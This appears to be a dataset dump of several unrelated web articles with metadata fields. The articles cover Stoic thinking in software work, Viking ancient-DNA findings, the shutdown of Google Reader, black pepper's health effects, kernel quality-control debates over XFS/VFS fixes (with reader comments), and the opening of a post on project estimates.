One estimation technique uses two scenarios, “highly probable” (HP) and “aggressive but possible” (ABP) to balance between an ABP best-case and more pessimistic HP view. Atomic also strives to have difficult conversations early. Our business relationships are built on trust, so it’s crucial for us to listen to those nagging doubts, and make sure that potential concerns are investigated, discussed with the customer in a helpful and timely way, and mitigated before they turn into crises.
## It’s All About Control
This brings us to the central idea of Stoicism: Understand what is in your control, what isn’t, and accept it. But don’t mistake this mindset for complacency.
Accepting that something is outside of your control doesn’t mean giving up. I might not like the weather, but I can’t change it. Denying the cold or rain won’t help me, but putting on some gloves or grabbing an umbrella will.
Of course, this is all easier said than done, and I’ve presented a fairly trivial “Hello World” example of accepting what is outside of our control. These Stoic ideas are difficult to implement, but they offer immense value in our day-to-day lives and in how we write software. So as we’re creating new software and gaining new knowledge, let’s not forget the old. | true | true | true | The idea of via negativa doesn’t mean “do nothing.” Instead, it means striving toward simplicity and asking, “What can I take away?” | 2024-10-12 00:00:00 | 2017-03-14 00:00:00 | article | atomicobject.com | Atomic Object | null | null |
|
24,506,724 | https://www.joh.cam.ac.uk/worlds-largest-ever-dna-sequencing-viking-skeletons-reveals-they-werent-all-scandinavian | World’s largest ever DNA sequencing of Viking skeletons reveals they weren’t all Scandinavian | null | ## World’s largest ever DNA sequencing of Viking skeletons reveals they weren’t all Scandinavian
#### “This study changes the perception of who a Viking actually was”
Invaders, pirates, warriors – the history books taught us that Vikings were brutal predators who travelled by sea from Scandinavia to pillage and raid their way across Europe and beyond.
Now cutting-edge DNA sequencing of more than 400 Viking skeletons from archaeological sites scattered across Europe and Greenland will rewrite the history books as it has shown:
- Skeletons from famous Viking burial sites in Scotland were actually local people who could have taken on Viking identities and were buried as Vikings.
- Many Vikings actually had brown hair
*not*blonde hair. - Viking identity was not limited to people with Scandinavian genetic ancestry. The study shows the genetic history of Scandinavia was influenced by foreign genes from Asia and Southern Europe
*before*the Viking Age. - Early Viking Age raiding parties were an activity for locals and included close family members.
- The genetic legacy in the UK has left the population with up to six per cent Viking DNA.
The six-year research project, published in *Nature *today (16 September 2020), debunks the modern image of Vikings and was led by Professor Eske Willerslev, a Fellow of St John’s College, University of Cambridge, and director of The Lundbeck Foundation GeoGenetics Centre, University of Copenhagen.
He said: “We have this image of well-connected Vikings mixing with each other, trading and going on raiding parties to fight Kings across Europe because this is what we see on television and read in books – but genetically we have shown for the first time that it wasn’t that kind of world. This study changes the perception of who a Viking actually was – no one could have predicted these significant gene flows into Scandinavia from Southern Europe and Asia happened before and during the Viking Age.”
The word Viking comes from the Scandinavian term ‘vikingr’ meaning ‘pirate’. The Viking Age generally refers to the period from A.D. 800, a few years after the earliest recorded raid, until the 1050s, a few years before the Norman Conquest of England in 1066. The Vikings changed the political and genetic course of Europe and beyond: Cnut the Great became the King of England, Leif Eriksson is believed to have been the first European to reach North America – 500 years before Christopher Columbus - and Olaf Tryggvason is credited with taking Christianity to Norway. Many expeditions involved raiding monasteries and cities along the coastal settlements of Europe but the goal of trading goods like fur, tusks and seal fat were often the more pragmatic aim.
Professor Willerslev added: “We didn’t know genetically what they actually looked like until now. We found genetic differences between different Viking populations within Scandinavia which shows Viking groups in the region were far more isolated than previously believed. Our research even debunks the modern image of Vikings with blonde hair as many had brown hair and were influenced by genetic influx from the outside of Scandinavia.”
#### “Our research debunks the modern image of Vikings with blonde hair as many had brown hair and were influenced by genetic influx from the outside of Scandinavia”
The team of international academics sequenced the whole genomes of 442 mostly Viking Age men, women, children and babies from their teeth and petrous bones found in Viking cemeteries. They analysed the DNA from the remains from a boat burial in Estonia and discovered four Viking brothers died the same day. The scientists have also revealed male skeletons from a Viking burial site in Orkney, Scotland, were not actually genetically Vikings despite being buried with swords and other Viking memorabilia.
There wasn’t a word for Scandinavia during the Viking Age - that came later. But the research study shows that the Vikings from what is now Norway travelled to Ireland, Scotland, Iceland and Greenland. The Vikings from what is now Denmark travelled to England. And Vikings from what is now Sweden went to the Baltic countries on their all male ‘raiding parties’.
Dr Ashot Margaryan, Assistant Professor at the Section for Evolutionary Genomics, Globe Institute, University of Copenhagen and first author of the paper, said: “We carried out the largest ever DNA analysis of Viking remains to explore how they fit into the genetic picture of Ancient Europeans before the Viking Age. The results were startling and some answer long-standing historical questions and confirm previous assumptions that lacked evidence.
“We determined that a Viking raiding party expedition included close family members as we discovered four brothers in one boat burial in Estonia who died the same day. The rest of the occupants of the boat were genetically similar suggesting that they all likely came from a small town or village somewhere in Sweden.”
DNA from the Viking remains were shotgun sequenced from sites in Greenland, Ukraine, The United Kingdom, Scandinavia, Poland and Russia.
Professor Martin Sikora, a lead author of the paper and an Associate Professor at the Centre for GeoGenetics, University of Copenhagen, said: “We found that Vikings weren’t just Scandinavians in their genetic ancestry, as we analysed genetic influences in their DNA from Southern Europe and Asia which has never been contemplated before. Many Vikings have high levels of non-Scandinavian ancestry, both within and outside Scandinavia, which suggest ongoing gene flow across Europe.”
The team’s analysis also found that genetically Pictish people ‘became’ Vikings without genetically mixing with Scandinavians. The Picts were Celtic-speaking people who lived in what is today eastern and northern Scotland during the Late British Iron Age and Early Medieval periods.
Dr Daniel Lawson, lead author from The University of Bristol, explained: “Individuals with two genetically British parents who had Viking burials were found in Orkney and Norway. This is a different side of the cultural relationship from Viking raiding and pillaging.”
The Viking Age altered the political, cultural and demographic map of Europe in ways that are still evident today in place names, surnames and modern genetics.
Professor Søren Sindbæk, an archaeologist from Moesgaard Museum in Denmark who collaborated on the ground-breaking paper, explained: “Scandinavian diasporas established trade and settlement stretching from the American continent to the Asian steppe. They exported ideas, technologies, language, beliefs and practices and developed new socio-political structures. Importantly our results show that ‘Viking’ identity was not limited to people with Scandinavian genetic ancestry. Two Orkney skeletons who were buried with Viking swords in Viking style graves are genetically similar to present-day Irish and Scottish people and could be the earliest Pictish genomes ever studied.”
Assistant Professor Fernando Racimo, also a lead author based at the GeoGenetics Centre in the University of Copenhagen, stressed how valuable the dataset is for the study of the complex traits and natural selection in the past. He explained: This is the first time we can take a detailed look at the evolution of variants under natural selection in the last 2,000 years of European history. The Viking genomes allow us to disentangle how selection unfolded before, during and after the Viking movements across Europe, affecting genes associated with important traits like immunity, pigmentation and metabolism. We can also begin to infer the physical appearance of ancient Vikings and compare them to Scandinavians today.”
The genetic legacy of the Viking Age lives on today with six per cent of people of the UK population predicted to have Viking DNA in their genes compared to 10 per cent in Sweden.
Professor Willeslev concluded: “The results change the perception of who a Viking actually was. The history books will need to be updated.”
**Published: 16/9/2020** | true | true | true | null | 2024-10-12 00:00:00 | 2020-09-16 00:00:00 | null | null | cam.ac.uk | joh.cam.ac.uk | null | null |
6,091,784 | http://www.buzzfeed.com/mattlynley/google-reader-died-because-no-one-would-run-it | Google Reader Died Because No One Would Run It | Matthew Lynley | There's a very simple corporate reason for why Google Reader was shut down earlier this month: No one internally deemed it important enough to even work on, much less save.
The decision had little to do with consumers — the RSS reader was very popular with a core set of power users — and much more to do with corporate politics. At Google, Chief Executive Larry Page and his inner circle of lieutenants, known as the "L Team," simply did not view Google Reader as an important strategic priority. Internally, it became obvious that despite Google Reader's loyal fan base, working on the project was not going to get the attention of Page, several sources close to the company told BuzzFeed.
While the company said Google Reader was shut down because of a decline in usage, a major reason for that was owed to the fact that the project lacked an engineering lead, in part because no one stepped up to the task and because Google leadership wasn't actively looking for one. Even when Google Reader was still public, without a leader it was functionally no longer a live project at Google, with engineers focusing more on Page's larger projects like Android, Chrome, Google Plus, and Search.
"We know Reader has a devoted following who will be very sad to see it go. We're sad too," Google software engineer Alan Green wrote in the farewell post for Google Reader. "There are two simple reasons for this: usage of Google Reader has declined, and as a company we're pouring all of our energy into fewer products. We think that kind of focus will make for a better user experience."
Google Reader began as an experiment under Google's "20% time" policy — which allows Google employees to devote 20% of their time to personal projects. It very quickly became extremely popular among a small subset of power users, but never reached the critical mass of Gmail or Android, for instance.
Google teams, like those at other tech companies, have product managers, but much of the company's leadership comes from its engineers. As a result, many product decisions come from and are executed by engineers, as was the case with Google Reader. Eventually, as Google Reader's importance declined internally, the engineering leads — the de facto leaders of the project — were moved onto more high-priority projects. (By the time Reader was shut down, the team didn't even have a product manager or full-time engineer, according to AllThingsD.)
There's been plenty of reading into whether the decision to shut down Google Reader means Google is trying to take over user data. There were also reports that privacy and compliance played into the decision as well. All of these probably played a part.
But the major factor is a bit simpler: No one wanted to devote the time and energy necessary to keep the project alive because it wasn't going to get them anywhere with Page. | true | true | true | <b>No one took ownership of Google Reader internally because it wasn't a top priority for Larry Page and his inner circle of lieutenants.</b> And if you aren't working on something that the boss cares about, then what's the point? | 2024-10-12 00:00:00 | 2013-07-23 00:00:00 | article | buzzfeednews.com | BuzzFeed News | null | null |
|
31,336,398 | https://theconversation.com/black-pepper-healthy-or-not-179815 | Black pepper: healthy or not? | Laura Brown | Everybody knows that consuming too much salt is bad for your health. But nobody ever mentions the potential impact of the other condiment in the cruet set: black pepper. Does it have an effect on your health?
Certainly, people through the ages have thought so. Black pepper, the dried berries of the *Piper nigrum* vine, has been part of traditional Indian (Ayurvedic) medicine for thousands of years. Ayurvedic practitioners believe that it has “carminative” properties – that is, it relieves flatulence. And in traditional Chinese medicine, black pepper is used to treat epilepsy.
Modern science suggests that black pepper does indeed confer health benefits, mainly as a result of an alkaloid called piperine – the chemical that gives pepper its pungent flavour, and a powerful antioxidant.
Antioxidants are molecules that mop up harmful substances called “free radicals”. An unhealthy diet, too much Sun exposure, alcohol and smoking can increase the number of free radicals in your body. An excess of these unstable molecules can damage cells, making people age faster and causing a range of health problems, including cardiovascular disease, cancer, arthritis, asthma and diabetes.
Laboratory studies in animals and in cells have shown that piperine counteracts these free radicals. In one study, rats were divided into several groups, with some rats fed a normal diet and other rats fed a high-fat diet. One group of rats was fed a high-fat diet supplemented with black pepper and another group of rats was fed a high-fat diet supplemented with piperine.
The rats fed a high-fat diet supplemented with black pepper or piperine had significantly fewer markers of free radical damage compared with rats just fed a high-fat diet. Indeed, their markers of free radical damage were comparable to rats fed a normal diet.
Piperine also has anti-inflammatory properties. Chronic inflammation is linked to a range of diseases, including autoimmune diseases, such as rheumatoid arthritis. Here again, animal studies have shown that piperine reduces inflammation and pain in rats with arthritis.
Black pepper can also help the body better absorb certain beneficial compounds, such as resveratrol – an antioxidant found in red wine, berries and peanuts. Studies suggest that resveratrol may protect against heart disease, cancer, Alzheimer’s and diabetes.
The problem with resveratrol, though, is that it tends to break apart before the gut can absorb it into the bloodstream. Black pepper, however, has been found to increase the “bioavailability” of resveratrol. In other words, more of it is available for the body to use.
Black pepper may also improve the absorption of curcumin, which is the active ingredient in the popular anti-inflammatory spice turmeric. Scientists found that consuming 20mg of piperine with 2g of curcumin improved the availability of curcumin in humans by 2,000%.
Other studies have shown that black pepper may improve the absorption of beta-carotene, a compound found in vegetables and fruits that your body converts into vitamin A. Beta-carotene functions as a powerful antioxidant that may fight against cellular damage. Research showed that consuming 15mg of beta-carotene with 5mg of piperine greatly increased blood levels of beta-carotene compared with taking beta-carotene alone.
## Piperine and cancer
Black pepper may also have cancer-fighting properties. Test-tube studies found that piperine reduced the reproduction of breast, prostate and colon cancer cells and encouraged cancer cells to die.
Researchers compared 55 compounds from a variety of spices and found that piperine was the most effective at increasing the effectiveness of a typical treatment for triple-negative breast cancer – the most aggressive type of cancer.
Piperine also shows promising effects in minimising multidrug resistance in cancer cells, which potentially reduces the effectiveness of chemotherapy.
A word of caution, though. All of these things are fairly uncertain, as most of the studies have been in cell cultures or animals. And these sorts of experiments don’t always “translate” to humans. However, you can be fairly certain that adding a few extra grinds of pepper to your food is unlikely to cause you harm – and may well be beneficial. | true | true | true | The king of spices has many health benefits – in rats, at least. | 2024-10-12 00:00:00 | 2022-04-08 00:00:00 | article | theconversation.com | The Conversation | null | null |
|
18,680,992 | https://lwn.net/SubscriberLink/774114/636f0ff05b24dc04/ | Kernel quality control, or the lack thereof | Jonathan Corbet December 7 | # Kernel quality control, or the lack thereof
Filesystem developers tend toward a high level of conservatism when it comes to making changes; given the consequences of mistakes, this seems like a healthy survival trait. One might rightly be tempted to regard a recent disagreement over the backporting of filesystem-related fixes to the stable kernels as an example of this conservatism, but there is more to it. The kernel development process has matured in many ways over the years; perhaps this discussion hints at some of the changes that will be needed to continue that maturation in the future.Ready to give LWN a try?With a subscription to LWN, you can stay current with what is happening in the Linux and free-software community and take advantage of subscriber-only site features. We are pleased to offer you
a free trial subscription, no credit card required, so that you can see for yourself. Please, join us!
While tracking down some problems with the XFS file cloning and
deduplication features (the `FICLONERANGE` and
`FIDEDUPERANGE` `ioctl()` calls in particular), the
developers noticed that, in fact, many aspects
of those interfaces did not work correctly. Resource limits were not
respected, users could overwrite a setuid file without resetting the setuid
bits, time stamps would not be updated, maximum file sizes would be
ignored, and more. Many of these problems were fixed in XFS itself, but
others affected all filesystems offering those features and needed to be
fixed at the virtual filesystem (VFS) level. The result was a series of
pull requests including this
one for 4.19-rc7, this
one for the 4.20 merge window, and
this
one for 4.20-rc4.
More recently, similar problems have been discovered with the
`copy_file_range()`
system call, resulting in this
patch set full of fixes. Once again, issues include the ability to
overwrite setuid files,
overwrite swap files, change immutable files, and overshoot resource
limits. Time stamps are not updated, overlapping copies are not caught,
and behavior between filesystems is inconsistent. Chinner's patch set
contains another set of changes,
almost all at the VFS level, to straighten these issues out.
#### Mainline quality assurance
The discovery of these bugs has brought a fair amount of disappointment with it. It seems clear that these new features were not extensively tested before being added to the kernel; certainly no automated tests had been added to the xfstests suite to verify them. Dave Chinner put it this way:
In time, these bugs will be fixed and users of all filesystems should benefit. Tests are being added to help ensure that these features continue to work in the future. This is clearly a necessary effort; Chinner and Darrick Wong are performing a service for the kernel community as a whole by taking it on. This work does raise a couple of interesting issues, though.
The first of those is the prospect of regressions in programs that have
come to depend on the behavior of these system calls as it is supported in
current kernels on specific filesystems. Hyrum's law suggests that such users
are likely to exist. Or, as Chinner put it: "the
API implementation is so broken right now that fixing it is almost
guaranteed to break something somewhere
". That could lead to some
interesting discussions if users start to complain that kernel updates have
broken their programs.
#### Stable updates
The other question that arises concerns the backporting of all these fixes to the stable kernel updates; indeed, it was the selection of one of the VFS fixes for backporting that set off the current conversation. The XFS developers have long been hostile to the automatic inclusion of their patches in stable updates, feeling that the work to validate those patches in older kernels has not been done and that the risk of creating new regressions is too high. As a result, XFS patches are not normally considered eligible for backporting, but that exclusion does not extend to fixes at the VFS layer.
In this case, Chinner stated that the current set of fixes has been validated for the mainline with a testing regime that runs billions of operations over a period of days; anything less risks not exposing some of the harder-to-hit bugs. Backporting those fixes to a different kernel would require the same level of testing to create the needed confidence that they don't create new problems, he said, and the XFS developers are too busy still fixing bugs to do that testing now.
Chinner followed
up with a lengthy indictment of the kernel development process as a
whole, saying that it is focused on speed and patch quantity rather than
the quality of the final result. The stable kernel process, in particular, is
"optimised to shovel as much change as possible with /as little
effort as possible/ back into older code bases
". He pointed out
that changes often appear in stable releases before they show up in a real
mainline release (as opposed to an -rc release), which doesn't leave a
whole lot of time for real stabilization. It is not, he feels, a small
problem:
Sasha Levin responded that the current process is the best that we can do at the moment:
For the time being, the VFS and XFS patches will not be included in the stable kernel updates. Once the fixes are complete and the filesystem test suites have been filled out, Wong said, it should be possible to safely backport the whole set. At that point, this particular issue will be solved, but that is not likely to happen until after the 4.21/5.0 kernel release.
For the longer term, there is still the problem that, as Wong put it:
"New features show up in the vfs without a lot of design
documentation, incomplete userspace interface manuals, and not much beyond
trivial testing
". One might well argue that this problem extends
beyond VFS features. The kernel community has never had much of a process
around the addition of APIs visible to user space; there are no real
requirements to ensure adequate documentation, testing, or consistency
between interfaces. The results can be seen in our released kernels, and
in the API mistakes that just barely escape release because the right
developer happened to notice them in time.
Over the years, the kernel community has matured considerably in a number
of ways. One need only look back to the days when we had no source-code
management system, no rules on regressions, and no release-management
discipline to see how much things have improved. The last few years have
seen some big improvements
around automated testing in particular. For all of our problems, the
quality of our
releases is quite a bit higher than it once was, even if it is not what it
should be. Given time, it is
reasonable to expect that we can build on that base to further focus our
processes on the quality of the kernels we release, if that is something
that the community decides it wants to do.
Index entries for this article | |
---|---|
Kernel | Development model/Kernel quality |
Kernel | System calls/copy_file_range() |
Posted Dec 7, 2018 19:21 UTC (Fri)
by
I always have to read these patch sets to make sure that when the above are features, they aren't getting removed.
There's a "if (!is_dedupe)" in the code, so it's all good.
Posted Dec 7, 2018 20:27 UTC (Fri)
by
Dare I predict 2020 will be the year when that day comes in the spirit of Jon predictions will soon be upon us ;)
Posted Dec 7, 2018 20:38 UTC (Fri)
by
Posted Dec 8, 2018 1:20 UTC (Sat)
by
Posted Dec 8, 2018 16:45 UTC (Sat)
by
Agreed 200%, this is the core issue:
> > We ended up here because we *trusted* that ...
Either tests already exist and it's just the matter of the extra mile to automate them and share their results.
Or there's no decent, repeatable and re-usable test coverage and new features should simply not be added until there is. "Thanks your patches looks great, now where are your tests results please?". Not exactly ground-breaking software engineering.
Exceptions could be tolerated for hardware-specific or pre-silicon drivers which require very specific test environments and for which vendors can only hurt themselves anyway. That clearly doesn't seem the case of XFS or the VFS.
Validation and automation have a lesser reputation than development and tend to attract less talent. One possible and extremely simple way to address this is to treat the *development* of tests and automation to the same open-source and code review standards.
Posted Dec 9, 2018 11:17 UTC (Sun)
by
Posted Dec 9, 2018 14:20 UTC (Sun)
by
Besides tests themselves, it helps a LOT to have some kind of test coverage report, just to remind you of which parts of the code are never touched by any of your current tests.
Do people publish such coverage reports for the kernel?
Posted Dec 10, 2018 9:49 UTC (Mon)
by
However I can pretty much say that the main problems I see are various corner cases that are rarely hit (i.e. mostly failures and error propagation) and drivers. My take on this is that there is no point in doing coverage analysis when the gaps we have are enormous and easy to spot. Just have a look at our backlog of missing coverage in LTP at the moment https://github.com/linux-test-project/ltp/labels/missing%..., and these are just scratching the surface with most obviously missing syscalls. We may try to proceed with the coverage analysis once we are out of work there, which will hopefully happen at some point.
The problems with corner cases can be likely caught by combination of unit testing and fuzzing. Drivers testing is more problematic though, there is only so much you can do with qemu and emulated hardware. Proper driver testing needs a reasonably sized lab stacked with hardware and it's much more problematic to set up and maintain which is not going to happen unless somebody invests reasonable amount of resources into it. But there is light at the end of the tunnel as well, as far as I know Linaro has a big automated lab stacked with embedded hardware to run tests on, we are trying to tackle automated server grade hardware lab here in SUSE, and I'm pretty sure there is a lot more outside there just not that visible to the general public.
Posted Dec 10, 2018 12:57 UTC (Mon)
by
There is no alternative to thinking about these problems, I'm afraid. There is no magic automatable road to well-tested software of this complexity.
Posted Dec 10, 2018 13:14 UTC (Mon)
by
Posted Dec 11, 2018 17:37 UTC (Tue)
by
Posted Dec 11, 2018 20:59 UTC (Tue)
by
Posted Dec 9, 2018 17:28 UTC (Sun)
by
Thinking of it computer security is a bit like... healthcare: extremely opaque and nearly impossible for customers to make educated choices about it. From a legal perspective I suspect it's even worse, breach after breach and absolutely zero liability. To top it up class actions are no longer, killed by arbitration clauses in all Terms and Conditions. Brands might be more useful in security though.
https://www.google.com/search?q=site%3Aschneier.com+liabi...
Posted Dec 9, 2018 13:32 UTC (Sun)
by
This is what we do in the i915 community. No feature lands in DRM without a test in IGT, and CI developers are part of the same team.
My view on this is that good quality comes from:
Point 1) is pretty much well done in the Linux community.
Point 2) is hard to justify when tests are not executed, but comes more naturally when we have a good CI system
Point 3) is probably the biggest issue for the Linux CI systems: The driver usually covers a wide variety of HW and configuration which cannot all be tested in CI at all time. This leads to complexity in the CI system that needs to be understood by developers in order to prevent regressions. This is why our CI is maintained and developed in the same team developing the driver.
Point 4) is coming pretty naturally when introducing a filtering system for CI failures. Some failures are known and pending fixing, and we do not want these to be considered as blocking for a patch series. We have been using bugs to create a forum of discussion for developers to discuss how to fix these issues. These bugs are associated to CI failures by a tool doing pattern matching (https://intel-gfx-ci.01.org/cibuglog/). The problem is that these bugs are now every developer's responsibility to fix, and that requires a change in the development culture to hold up some new features until some more important bugs are fixed.
I guess we are getting quite good at CI, and I am really looking forward to us in the CI team to have more time to share our knowledge and tools for others to replicate! We have already started working on an open source toolbox for CI (https://gitlab.freedesktop.org/gfx-ci), as discussed at XDC 2018 (https://xdc2018.x.org/slides/GFX_Testing_Workshop.pdf).
Posted Dec 10, 2018 20:35 UTC (Mon)
by
You may wish to subscribe to fstests@vger.kernel.org or peruse git://git.kernel.org/pub/scm/fs/xfs/xfstests-dev.git if this sort of thing is of interest to you.
Posted Dec 9, 2018 1:46 UTC (Sun)
by
Posted Dec 20, 2018 12:26 UTC (Thu)
by
The guys at the company I was contracted to were trying to abstract out the OS-specific features, like in the OPEN statement. You could declare a file as temporary, which led to it disappearing when it got closed - quite a nice feature IF IMPLEMENTED CORRECTLY!
So, I opened a temporary file on a FUNIT, then later on re-used the same FUNIT for a permanent file. THE OS DIDN'T CLEAR THE TEMPORARY STATUS. So when I closed the permanent file, it disappeared ... :-)
Cheers,
Posted Dec 10, 2018 14:43 UTC (Mon)
by
Posted Dec 10, 2018 18:42 UTC (Mon)
by
Don't get me wrong, code coverage is fine as far as it goes, and it seems likely that the Linux kernel community would do well to do more of it, but it is not a panacea. In particular, beyond a certain point, it is probably not the best place to put your testing effort.
Posted Dec 10, 2018 19:59 UTC (Mon)
by
Posted Dec 10, 2018 20:21 UTC (Mon)
by
Posted Dec 11, 2018 5:51 UTC (Tue)
by
Posted Dec 18, 2018 11:46 UTC (Tue)
by
Posted Dec 18, 2018 14:05 UTC (Tue)
by
Posted Dec 19, 2018 13:43 UTC (Wed)
by
Posted Dec 19, 2018 16:04 UTC (Wed)
by
Posted Dec 20, 2018 3:45 UTC (Thu)
by
Posted Dec 20, 2018 4:37 UTC (Thu)
by
Posted Dec 11, 2018 7:37 UTC (Tue)
by
Interesting, could you share a simplified example?
> My experience with code coverage metrics has been mostly negative.
While error-handling code, corner cases and... backup configurations are notoriously untested, I agree there are diminishing returns and better trade-offs past some point. Curious what is experts' guestimation of where that percentage typically is.
Posted Dec 11, 2018 14:11 UTC (Tue)
by
If only (say) 30% of your code is tested, you very likely need to substantially increase your coverage. If (say) 90% of your code is tested, there is a good chance that there is some better use of your time than getting to 91%. But for any rule of thumb like these, there will be a great many exceptions, for example, the safety-critical code mentioned earlier.
Hey, you asked! :-)
Posted Dec 11, 2018 20:53 UTC (Tue)
by
Sincere thanks!
Posted Jan 5, 2019 18:06 UTC (Sat)
by
Posted Jan 5, 2019 22:29 UTC (Sat)
by
Nevertheless, your last sentence is spot on. It is precisely because rcutorture forces rare code paths and rare race conditions to execute more frequently that the number of RCU bugs reaching customers is kept down to a dull roar.
Posted Dec 10, 2018 21:18 UTC (Mon)
by
Posted Dec 10, 2018 21:50 UTC (Mon)
by
For most types of software, at some point it becomes more important to test more races, more configurations, more input sequences, and more hardware configurations than to provide epsilon increase in coverage by triggering that next assertion. After all, testing and coverage is about reducing risk given the time and resources at hand. Therefore, over-emphasizing one form of testing (such as coverage) will actually increase overall risk due to the consequent neglect of some other form of testing.
Of course, there are some types of software where 100% coverage is reasonable, for example, certain types of safety-critical software. But in this case, you will be living under extremely strict coding standards so as to (among a great many other things) make 100% coverage affordable.
Posted Dec 24, 2018 20:42 UTC (Mon)
by OTOH, how do you test your safety net? Remember that Ariane 5 was exploded by a safety net that was supposed (and proven) to never trigger.
Posted Dec 25, 2018 0:05 UTC (Tue)
by
But yes, Murphy will always be with us. So even in safety critical code, at the end of the day it is about reducing risk rather than completely eliminating it.
And to your point about Ariane 5's failed proof of correctness... Same issue as the classic failed proof of correctness for the binary search algorithm! Sadly, a proof of correctness cannot prove the assumptions on which it is based. So Murphy will always find a way, but it is nevertheless our job to thwart him. :-)
Posted Dec 30, 2018 11:22 UTC (Sun)
by
E.g.:
In theory, it should never assert. In reality, it is desirable to minimize a risk that 'explosiveness' variable is stored in a failed memory cell, prior that cell is used for indication of explosiveness of any kind.
Or this case:
It is very rare to trigger and almost impossible to test such assertions, but when I saw them triggered in reality, even once in a lifetime, I appreciated their merit.
Posted Dec 30, 2018 15:44 UTC (Sun)
by
But if the point was in fact to warn about unreliable memory, mightn't this sort of fault injection nevertheless be quite useful?
## Kernel quality control, or the lack thereof
**zblaxell** (subscriber, #26385)
[Link]
## Kernel quality control, or the lack thereof
**johannbg** (guest, #65743)
[Link]
## Kernel quality control, or the lack thereof
**mgross** (guest, #38112)
[Link]
## Kernel quality control, or the lack thereof
**vomlehn** (guest, #45588)
[Link] (11 responses)
## Kernel quality control, or the lack thereof
**marcH** (subscriber, #57642)
[Link] (9 responses)
## Kernel quality control, or the lack thereof
**iabervon** (subscriber, #722)
[Link] (7 responses)
## Kernel quality control, or the lack thereof
**saffroy** (guest, #43999)
[Link] (5 responses)
## Kernel quality control, or the lack thereof
**metan** (subscriber, #74107)
[Link] (4 responses)
## Kernel quality control, or the lack thereof
**nix** (subscriber, #2304)
[Link] (3 responses)
## Kernel quality control, or the lack thereof
**metan** (subscriber, #74107)
[Link] (2 responses)
## Kernel quality control, or the lack thereof
**nix** (subscriber, #2304)
[Link] (1 responses)
## Kernel quality control, or the lack thereof
**marcH** (subscriber, #57642)
[Link]
## Kernel quality control, or the lack thereof
**marcH** (subscriber, #57642)
[Link]
## Kernel quality control, or the lack thereof
**mupuf** (subscriber, #86890)
[Link]
1) Well written driver code, peer reviewed to catch architectural issues
2) Good tests exercising the main use case, and corner cases. Tests are considered at the same level as driver code.
3) Good understand of the CI system that will execute these tests
4) Good following of the bugs filed when these tests fail
## Kernel quality control, or the lack thereof
**sandeen** (guest, #42852)
[Link]
## Kernel quality control, or the lack thereof
**luto** (subscriber, #39314)
[Link] (1 responses)
## Kernel quality control, or the lack thereof
**Wol** (subscriber, #4433)
[Link]
Wol
## Kernel quality control, or the lack thereof
**xorbe** (guest, #3165)
[Link] (21 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] (20 responses)
## Kernel quality control, or the lack thereof
**shemminger** (subscriber, #5739)
[Link] (13 responses)
Managers look at the % numbers and it causes developers to rearrange code to have a single return to maximize the numbers.
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link]
## Kernel quality control, or the lack thereof
**JdGordy** (subscriber, #70103)
[Link] (6 responses)
## Kernel quality control, or the lack thereof
**error27** (subscriber, #8346)
[Link] (5 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] (4 responses)
## Kernel quality control, or the lack thereof
**mathstuf** (subscriber, #69389)
[Link] (3 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] (2 responses)
## Kernel quality control, or the lack thereof
**neilbrown** (subscriber, #359)
[Link] (1 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link]
## Kernel quality control, or the lack thereof
**marcH** (subscriber, #57642)
[Link] (4 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] (3 responses)
## Kernel quality control, or the lack thereof
**marcH** (subscriber, #57642)
[Link]
## Kernel quality control, or the lack thereof
**joseph.h.garvin** (subscriber, #64486)
[Link] (1 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link]
But anything less than 100% coverage ## Kernel quality control, or the lack thereof
**NAR** (subscriber, #1313)
[Link] (5 responses)
**guarantees** that some part of the code is not tested...
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] (4 responses)
I would expect that defensive coding practices that lead to unreachable code (and thus <100% coverage) are particularly widespread in safety-critical software. I.e., you cannot trigger this particular safety-net code, and you are pretty sure that it cannot be triggered, but not absolutely sure; or even if you are absolutely sure, you foresee that the safety net might become triggerable after maintenance. Will you remove the safety net to increase your coverage metric?
## Kernel quality control, or the lack thereof
**anton** (subscriber, #25547)
[Link] (3 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link]
## Kernel quality control, or the lack thereof
**GoodMirek** (subscriber, #101902)
[Link] (1 responses)
I saw that multiple times while working on embedded systems.
explosiveness=255;
if explosiveness !=255 then assert;
if <green> then
explosiveness=0;
else
explosiveness=255;
if (explosiveness!=0 and explosiveness!=255) then assert;
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] | true | true | true | null | 2024-10-12 00:00:00 | 2018-12-07 00:00:00 | null | null | null | null | null | null |
14,947,199 | https://github.com/shivylp/usher | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
20,391,960 | https://locastic.com/blog/road-to-estimates/ | Road to Estimates | Danilo Trebješanin | In this blog post, I’d like to give an overview of how we come up with project estimates and business proposals for our clients. Working as a Project Manager (PM) for the past 5 years in a software agency setting has led me to all kinds of different theories and methods for tackling the *“How much will it cost?”* question. From do-no-estimates-at-all, to write (and apparently foresee) everything up-front in a huge Tome of Specification, there are many different approaches but none of them quite fit the way our teams in Locastic work.
After some trial and error, I came up with a *“method”* of creating estimates for each project, both time and price-wise. I’m sure some of you reading this will be flabbergasted that we even dare put working hour estimates on anything, and some of you will find this method too imprecise, but it has worked quite well for us in the past year or so. Anyway, I’ll leave a link to a shared google sheets file at the end of the blog post that we use for all types of projects, and if anyone finds it useful I suppose typing this was worth it.
Before we dip our feet in the great unknown of estimates, there are 2 important categories that we need to define:
**Types of Projects****Preconditions of good estimates.**
## Types of Projects
In an agency setting, there are a number of ways a project can be perceived, but right now I want to focus on how we categorize projects based on budget and requirements. A project can have a:
**Flexible budget + Project idea****Fixed budget + Project idea****Flexible budget + Project specification (and/or wireframes/prototypes)****Fixed budget + Project specification (and/or wireframes/prototypes).**
